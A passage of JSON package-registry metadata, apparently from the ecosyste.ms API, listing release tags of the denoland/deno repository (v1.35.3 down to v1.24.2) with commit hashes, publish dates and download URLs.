14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"